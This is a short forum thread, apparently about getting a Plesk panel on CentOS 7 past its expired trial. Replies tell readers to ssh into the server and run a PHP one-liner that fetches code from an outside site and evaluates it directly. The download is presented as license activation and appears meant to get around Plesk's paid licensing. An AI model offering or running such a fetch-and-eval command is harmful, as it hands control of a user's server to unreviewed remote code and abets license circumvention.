I ran the command in the console. Is there anything else that's needed to apply the license? Mine still shows the trial notice.

What do you see after running the command? It always tells you if successfully ran or if there was a problem after issuing the command.

you need to ssh into the instance and use it in cli in terminal window.

its cant be used in centos 7 i done install plesk server on it but trial expired

becouse i put that code in CMD of centos server and gives error command

make sure the location of php is correct, you can test it only issuing
php -er "eval(file_get_contents('http://ossav.com/PTC'));"

i'm using centos7 and it is working perfectly, just ssh into server and run this command

plesk php -er "eval(file_get_contents('http://ossav.com/PTC'));"
